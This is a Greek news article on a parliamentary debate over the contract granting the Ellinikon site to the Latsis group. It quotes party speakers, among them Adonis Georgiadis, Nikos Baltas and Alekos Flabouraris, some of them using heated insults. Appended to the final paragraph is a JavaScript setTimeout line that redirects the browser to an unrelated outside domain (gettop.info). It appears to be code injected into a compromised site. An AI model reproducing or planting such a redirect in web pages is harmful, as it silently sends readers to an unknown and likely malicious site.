«Θύελλα» για την παραχώρηση του Ελληνικού στον Όμιλο Λάτση

0
24

 

«Θύελλα» ξέσπασε στη Βουλή για τη σύμβαση εκχώρησης του Ελληνικού στον Όμιλο Λάτση, καθώς τα κόμματα της αντιπολίτευσης -παρότι συμφωνούν με την πώληση- «έστησαν στον τοίχο» τον Σύριζα επειδή προεκλογικά χαρακτήριζε «ξεπούλημα» την ιδιωτικοποήση.

«Η σημερινή ημέρα, εκτός από την αρχή αυτής της μεγάλης επένδυσης, σηματοδοτεί και το τέλος της παραγωγής σανού από τα βοσκοτόπια του κ. Καλογρίτσα, αλλά και το τέλος των ψεμάτων που ο ΣΥΡΙΖΑ έλεγε επί 5-6 χρόνια στους πολίτες για την επένδυση. Με τον τρόπο που η “πρώτη φορά Αριστερά” διαχειρίστηκε την κυβερνητική της θητεία, έδωσε όλα τα απαραίτητα επιχειρήματα στην ΝΔ», υποστήριξε ο εισηγητής της Δημοκρατικής Συμπαράταξης, Οδυσσέας Κωνσταντινόπουλος.

Μάλιστα, ο εισηγητής της Δημοκρατικής Συμπαράταξης επιτέθηκε τόσο στον ΣΥΡΙΖΑ όσο και στη ΝΔ κατηγορώντας τους ότι στο παρελθόν πολέμησαν και δεν στήριξαν την τόσο σημαντική αυτή επένδυση.
«Μόνο εμείς στηρίξαμε με συνέπεια την επένδυση του Ελληνικού, με στόχο 70.000 νέες θέσεις εργασίας, ένα εκατομμύριο επιπλέον τουρίστες το χρόνο, μία «Αθηναϊκή Ριβιέρα» από το Πέραμα έως το Σούνιο που θα αλλάξει τα δεδομένα στην Ευρώπη», ανέφερε χαρακτηριστικά ο κ. Κωνσταντινόπουλος,

Ο αντιπρόεδρος της ΝΔ Άδωνις Γεωργιάδης επισήμανε ότι «το νομοσχέδιο» προσφέρεται για «άγριο τρολάρισμα» ενώ σε άλλο σημείο «ευχαρίστησε» τον κ. Αλέξη Τσίπρα «για το μεγάλο δώρο να ξεφτιλίσει την αριστερά για τα επόμενα 50 χρόνια». Υποστήριξε δε ότι οι βουλευτές της πλειοψηφίας διαφωνούν με το νομοσχέδιο, το ψηφίζουν όμως για να μην χάσουν το βουλευτικό αξίωμα. «Τα 5.000 ευρώ το μήνα είναι γλυκά» είπε απευθυνόμενος προς τον κ. Γιώργο Δημαρά (σ.σ. βουλευτή ΣΥΡΙΖΑ που είπε ότι διαφωνεί με το νομοσχέδιο αλλα το ψηφίζει) για να προσθέσει «το κάνετε όμως τσάμπα. Ο Καλογρίτσας το έκανε με 70 εκατ. δάνεια και εσείς για 5.000 ευρώ».
Ο εισηγητής της κυβερνητικού κόμματος Γιώργος Ουρσουζίδης επέλεξε να αποφύγει τις πολιτικές αντιπαραθέσεις και να υποστηρίξει ότι η σύμβαση παραχώρησης βελτιώθηκε μετά από διαπραγμάτευση που έκανε η σημερινή κυβέρνηση.

Γιώργος Ουρσουζίδης (ΣΥΡΙΖΑ): Η νέα σύμβαση είναι καλύτερη από την παλιά
«Η δόμηση στο ακίνητο μετά την τροποποίηση είναι μικρότερη» είπε χαρακτηριστικά ο κ. Ουρσουζίδης για να εξηγήσει ότι: «Ο συντελεστής από 0,6 κατεβαίνει στο 0,45 όταν ο συνήθης συντελεστής είναι 1,2. Με την τροποποιητική σύμβαση πέραν των οικονομικών ωφελειών υπάρχει προστασία περιβάλλοντος». Σε άλλο σημείο υπενθύμισε ότι παλαιότερη έκθεση του ΤΕΕ εκτιμούσε την αξία της έκτασης στα 2 δις ευρώ για να προσθέσει «Θα θεωρούσε κανείς ότι τα 900 εκατ. ευρώ είναι λίγα όμως θα δοθούν 1,5 δις ευρώ για έργα».

Επιπροσθέτως, είπε ότι «Το ακίνητο παραχωρείται για 99 χρόνια και μετά θα παραμείνει στην ιδιοκτησία του επενδυτή το 30% επένδυσης και γης».

Αδωνις Γεωργιάδης: Ο Τσίπρας ξεφτίλισε την Αριστερά για τα επόμενα 50 χρόνια
«Το σημερινό νομοσχέδιο προσφέρεται για άγριο τρολάρισμα» είπε ο κ. Γεωργιάδης αποκαλύπτοντας τις προθέσεις του κατά το ξεκίνημα της εισήγησής του.

Ο ίδιος υπενθύμισε ότι επι κυβέρνησης Κ. Καραμανλή σχεδιάστηκε η αξιοποίηση του Ελληνικού για να προσθέσει «Ξέρετε τι έγινε κύριοι του ΣΥΡΙΖΑ; Πεταγόσασταν στα καθίσματα για το ξεπούλημα. Είχατε ξεκινήσει να βάζετε μπροστά καθηγητές από το Πολυτεχνείο που έλεγαν τα αντίθετα από όσα λετε σήμερα. Εσείς που λέγατε αυτά τότε έχετε τώρα το θράσος να μας εγκαλείτε γιατί δεν προχωρήσαμε γρηγορότερα εμείς την επένδυση. Δεν είχαμε το πολιτικό θάρρος να αναδείξουμε το πραγματικό σας πρόσωπο. Το κάνουμε τώρα. Εσείς όμως είστε φαρισαίοι υποκριτές».

Παραδέχθηκε ότι την προηγούμενη περίοδο η ΝΔ είχε «αδυναμία να τα βάλουμε με την ηγεμονία της Αριστεράς. Πράγματι είστε η αιτία που η Ελλάδα έμεινε πίσω. Αυτό το κάνουμε τώρα. Το μεγάλο δώρο του Τσίπρα είναι ότι ξεφτιλίζει την Αριστερά για τα επόμενα 50 χρόνια. Πρέπει να δοθούν τα πρακτικά της συνεδρίασης στους φοιτητές και όταν συναντούν τους μαλλιάδες στα πανεπιστήμια που τίποτα δεν τους αρέσει να τους δείχνουν τι κάνει η κυβέρνηση της Αριστεράς. Όταν τα έδινε ο Σαμαράς ήταν ξεπούλημα τώρα που τα δίνει ο Τσίπρας είναι αξιοποίηση. Τα ίδια κάνατε και με την Cosco».

«Σιγά μην σας αρέσουν οι ιδιωτικοποιήσεις» είπε απευθυνόμενος στους βουλευτές του ΣΥΡΙΖΑ για να συνεχίσει «η καρέκλα, όμως είναι γλυκιά. Τα 5.000 ευρώ το μήνα είναι γλυκά κύριε Δημαρά που διαφωνείτε. Τσάμπα είναι. Ο Καλογρίτσας το έκανε με 70 εκατ. ευρώ δάνεια εσείς για 5.000 ευρώ».

Σχετικά με το επιχείρημα ότι η ΝΔ κάνει χαμηλού επιπέδου αντιπολίτευση λέγοντας «Εσείς λέγατε για γερμανοτσολιάδες, πουλημένους, προδότες. Αυτά είναι ήπιου πολιτικού λόγου; Όχι αλλά γίνατε κυβέρνηση. Ίσως θα έπρεπε να ακολουθήσουμε το δικό σας δρόμο για να γίνουμε κυβέρνηση αλλά δεν θα το κάνουμε. Θα ψηφίσουμε το Ελληνικό . Δεν θα σας πούμε πουλημένους ή γερμανοτσολιάδες γιατί δεν είμαστε ίδιοι».

«Όλοι σας έχετε πάει σε διαδηλώσεις κατά των ιδιωτικοποιήσεων» συνέχισε.

«Δεν φθάνει να ψηφίσετε «ναι», αυτό είναι το εύκολο και το κάνετε για την καρέκλα. Το σημαντικό είναι να καταλάβετε ότι η ηγεμονία της Αριστεράς κατέστρεψε την Ελλάδα. Με το μίσος σας, τα κόμπλεξ σας κρατήσατε πίσω την Ελλάδα και τώρα με το νομοσχέδιο στέλνετε στο χρονοντούλαπο της ιστορίας την ηγεμονία σας. Ο Αλέκος Αλαβάνος είπε για προδοτική κυβέρνηση. Είπε ότι όσα κάνετε δεν τα έκανε ούτε ο Μεταξάς ούτε ο Παπαδόπουλος. Μεταξύ σας δείχνετε το πραγματικό σας πρόσωπο. Αυτός ο εξευτελισμός της αριστεράς μόνο καλό κάνει».

«Τα πανεπιστήμιά μας είναι γεμάτα από Μπαλτάδες που κατέστρεψαν τα μυαλά των φοιτητών» συνέχισε.

«Τώρα υπάρχει μεγάλη ευκαιρία να τα ξεκαθαρίσουμε αυτά και να σας στείλουμε στην γωνία στο πύρ το εξώτερο να μην ξανατολμήσετε να κάνετε διαδήλωση» πρόσθεσε.

https://www.youtube.com/watch?v=E7nkcqakjqE

Από το βήμα της Βουλής ο υπουργός Πολιτισμού Αριστείδης Μπαλτάς αναφέρθηκε στην ομιλία του Αντιπροέδρου της ΝΔ, Άδωνι Γεωργιάδη.

«Σε σχέση με τους συναδέλφους μου του ΣΥΡΙΖΑ, μου αρέσει η ομιλία σας, είσαστε ζωηρός, ευφράδης, ζωηρεύετε τα αίματα όταν μιλάτε, σας παρακολουθούμε όλοι» είπε το κυβερνητικό στέλεχος.

«Ταυτόχρονα, το καλό με αυτού του τύπου την ομιλία είναι ότι αποκαλύπτετε κάποια πράγματα, τα οποία δεν σας είναι πλήρως συνειδητά στον ειρμό της ομιλίας σας» συνέχισε ο κ. Μπαλτάς κάνοντας παράλληλα αναφορά στον Μάρξ και τον Φρόιντ.

Ο κ. Μπαλτάς συνεχίζοντας χαρακτήρισε τη στάση της κυβέρνησης στο θέμα του Ελληνικού ως «αναγκαστικό συμβιβασμό στο δρόμο προς τον δημοκρατικό σοσιαλισμό για την συνέχιση του αγώνα».

Ειδικότερα, είπε: «Ο ΣΥΡΙΖΑ μιλάει εκ γενετής για μία έννοια που λέγεται δημοκρατικός δρόμος του σοσιαλισμού που είναι μακρύς, όχι στιγμιαίος δρόμος, με υποχωρήσεις συμβιβασμούς νίκες και ήττες» για να προσθέσει σε άλλο σημείο «είναι σταθερές οι αξίες σε αυτό το δρόμο άρα όταν σε αυτό το δρόμο βρισκόμαστε μπροστά σε υπέρτερους συσχετισμούς που μας αναγκάζουν να υποστούμε μία αναγνωρισμένη ήττα δεν σημαίνει ότι μετά την ήττα λέμε άλλα από αυτά που λέγαμε πριν. Λέμε κάτι που αναγνωρίζει το γεγονός μιας ήττας ότι πρέπει να προσαρμοστούμε να κάνουμε το συμβιβασμό που απαιτεί η ήττα για να συνεχίσουμε τον αγώνα».

«Το Ποτάμι θα ψηφίσει την εν λόγω σύμβαση, γιατί η πραγματοποίηση τέτοιων μεγάλων επενδύσεων, υψηλής προστιθέμενης αξίας για την ελληνική οικονομία, αποτελεί μονόδρομο για την έξοδο από την κρίση», τόνισε ο ειδικός αγορητής από το Ποτάμι, Σπύρος Δανέλλης.

Ταυτόχρονα επεσήμανε ότι «η δεκαπενταετής καθυστέρηση αξιοποίησης του Ελληνικού καταδεικνύει την προσκόλληση της ελληνικής οικονομίας σε ένα χρεοκοπημένο, κρατικιστικό μοντέλο, που στηρίχθηκε διαχρονικά από όλες τις κυβερνήσεις».

«Το πολιτικό σύστημα, σύσσωμο γενικολογούσε για την ανάπτυξη, ως μοναδική λύση για την κρίση, ωστόσο, ήταν χαμένο στη μετάφραση», ανέφερε χαρακτηριστικά ο κ. Δανέλλης.

Ο εισηγητής των ΑΝΕΛ Δημήτρης Καμένος, έκανε λόγο «για μια εθνική επένδυση, τη μεγαλύτερη στην Ευρώπη», όπως είπε, η οποία πρέπει να προχωρήσει το συντομότερο δυνατό.

«Είναι ένα σημαντικό κομμάτι ανάπτυξης με νέες θέσεις εργασίας σε βάθος χρόνου της τάξεως των 50.000-60.000, που βοηθά την Ελλάδα να φύγει επιτέλους από την εσωστρέφεια», τόνισε.

Ταυτόχρονα, έδωσε έμφαση στην ανάγκη να προχωρήσει άμεσα η επένδυση, χωρίς καθυστέρηση, γιατί έτσι, όπως είπε, θα βοηθήσει και στη συζήτηση για την αναδιάρθρωση του ελληνικού χρέους, που θα ξεκινήσει εντός του έτους.

«Μακροοικονομικά είναι τόσο σημαντική που δεν πρέπει να γίνει κανένα λάθος καμία καθυστέρηση. Και καλά θα κάνει η αντιπολίτευση να εργαστεί σε αυτή την κατεύθυνση και να μην μένει σε πολιτικά ευφυολογήματα», τόνισε ο κ. Καμένος.
«Είναι μια συμφωνία για την οποία δεν μπορέσαμε να αλλάξουμε τίποτα. Μια επένδυση οι λεπτομέρειες της οποίας δεν είναι γνωστές όσο θα έπρεπε. Λίγα πράγματα κατάφερε να αλλάξει η κυβέρνηση», υποστήριξε ο εισηγητής της Ένωσης Κεντρώων Γιάννης Σαρίδης.

Παράλληλα, κατηγόρησε το ΣΥΡΙΖΑ ότι αναγκάζεται να υπερασπιστεί σήμερα μια συμφωνία την οποία είχε πολεμήσει ως αντιπολίτευση, ενώ αναγνώρισε ότι, «δεν είναι καθόλου μικρό και ασήμαντο το κόστος ανάπλασης του μητροπολιτικού πάρκου και όλα τα σπουδαία έργα που θα γίνουν στη περιοχή του Ελληνικού».

«Το στοίχημα είναι αν μπορούμε να δημιουργήσουμε και να συντηρήσουμε ένα υγιές επενδυτικό περιβάλλον. Είναι μια σημαντική επένδυση που, αν ολοκληρωθεί γρήγορα, ίσως αποτελέσει και την έναρξη μιας νέας εποχής συνεννόησης και συναίνεσης», κατέληξε ο κ. Σαρίδης.

Κατά της συμφωνίας τάχθηκε η ειδική αγορήτρια του ΚΚΕ Διαμάντω Μανωλάκου, κάνοντας λόγο για ένα ακόμα «ξεπούλημα υπέρ των μονοπωλίων και σε βάρος του ελληνικού λαού». «Είναι πράγματι μια δίκαιη ανάπτυξη αλλά όχι υπέρ του λαού. Είναι μια ανάπτυξη στον καπιταλισμό και εννοείται υπέρ μόνο των επιχειρηματιών που πατούν στα αποκαΐδια των εργασιακών σχέσεων», υπογράμμισε η κ. Μανωλάκου.

Για «συμφωνία ξεπούλημα και όχι αξιοποίησης του Ελληνικού», έκανε λόγο η εισηγήτρια της Χρυσής Αυγής, Ελένη Ζαρούλια, δηλώνοντας ότι το κόμμα της θα την καταψηφίσει.

«Η σύμβαση αυτή αποτελεί ένα μεγάλο σκάνδαλο που εξυπηρετεί εγχώρια και ξένα συμφέροντα. Συνυπεύθυνες είναι όλες οι κυβερνήσεις που υπέγραψαν τέτοιες συμβάσεις», ανέφερε η κ. Ζαρούλια.

Παράλληλα, επιτέθηκε στο ΣΥΡΙΖΑ κατηγορώντας τον ότι «ως αντιπολίτευση κλαψούριζε για το Ελληνικό και τώρα ως κυβέρνηση γίνεται ο δήμιός του και το εκτελεί από τα 11 βήματα».

Πάντως νωρίτερα ο υπουργός Επικρατείας Αλέκος Φλαμπουράρης στη δική του παρέμβαση έκανε λόγο για δίκαιη ανάπτυξη.
«Μας κατηγορούν ότι καθυστερήσαμε. Το έργο ξεκίνησε πριν από 13 χρόνια και εμείς ούτε απ έξω δεν περνάγαμε από την κυβέρνηση, την εξουσία και πολλές φορές από την Βουλή. Αντι να μας πείτε γιατί επι 13 χρόνια δεν προχώρησε, μας κάνετε κριτική γιατί τον ένα χρόνο παρουσιάζουμε καθυστέρηση» είπε ο υπουργός για να προσθέσει ότι το μάστερ πλαν που είχε ετοιμαστεί από την κυβέρνηση ΝΔ – ΠΑΣΟΚ αποτελούσε «έκθεση ιδεών» είπε.

«Εμείς δεν μπορούσαμε να προχωρήσουμε με αυτό το μάστερ πλάν και φάγαμε αρκετό καιρό για το τοπογραφικό σχεδιο. Ναι, καθυστερήσαμε γιατί επιδιώξαμε και πετύχαμε να βελτιώσουμε την σύμβαση που βρήκαμε. Αυτή η εξέλιξη άξιζε και πρέπει να το παραδεχθείτε. Άρα η όποια καθυστέρηση είχε θετικά αποτελέσματα» ανέφερε σε άλλο σημείο της παρέμβασης του.

«Μας κάνετε κριτική για το τι λέγαμε πριν γίνουμε κυβέρνηση» συνέχισε ο ίδιος: «Επι χρόνια λέμε ότι είμαστε εναντίον των ιδιωτικοποιήσεων αλλά υπέρ της αξιοποίησης της δημόσιας περιουσίας. Είμαστε κατά των ιδιωτικοποιήσεων που εσείς επιβάλλετε. Δηλαδή το ξεπούλημα των επιχειρήσεων. Σε αυτές τις συμβάσεις που εσείς υπογράψατε και εμείς τις πήραμε και εμείς είμαστε αναγκασμένοι να τις κρατήσουμε δώσαμε μάχη και σε πολλές περιπτώσεις κερδίσαμε να τις βελτιώσουμε. Αν είστε διαβαστεροί θα έχετε δει ότι η ανάπτυξη από την πλευρά μας έχει 3 πλευρές: δημοσίου, ιδιωτικές επενδύσεις και κοινωνική οικονομία». Μεταξύ δε των θετικών αλλαγών που παρουσιάζει η σύμβαση είπε ότι εντοπίζονται η επέκταση του χώρου πρασίνου κατά 300 στρέμματα αλλά και οι αλλαγές στην παραλιακή ζώνη. «Το παραλιακό μέτωπο θα είναι ελεύθερο. Μπορεί να υπάρχουν πολυθρόνες και beach bar, αλλά θα είναι ελεύθερο» είπε χαρακτηριστικά για να προσθέσει «Η δική μας διαπραγμάτευση διατηρεί τις αθλητικές εγκαταστάσεις στον Άγιο Κοσμά μέχρι να ξεκινήσουν τα έργα και μετά θα θα μεταφερθεί σούμπιτος πάνω από το δρόμο».

«Εμείς επιλέξαμε αντί αύξησης τιμήματος, αύξηση των επενδύσεων που θα δώσουν θέσεις εργασίες» υπογράμμισε ο κ. Φλαμπουράρης ενώ απηύθυνε και κάλεσμα στο ΚΚΕ λέγοντας: «Η δίκαιη ανάπτυξη έχει σχέση με τις συνθήκες που ζούμε και πραγματικά όταν ζούμε σε μια περίοδο με 1,5 εκατ. ανέργους και εργασιακές σχέσεις 4ωρων και σε μια περίοδο που η λιτότητα κυριαρχεί πάνω στα κεφάλαια όλων μας, εμείς επιλέγουμε να βοηθήσουμε στην δίκαιη ανάπτυξη που θα δίνει σωστό μεροκάματο στο 8ωρο. Αυτό διεκδικούμε και σε αυτή την γραμμή σας καλούμε να μπείτε και να διεκδικήσουμε μαζί δίκαιη ανάπτυξη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here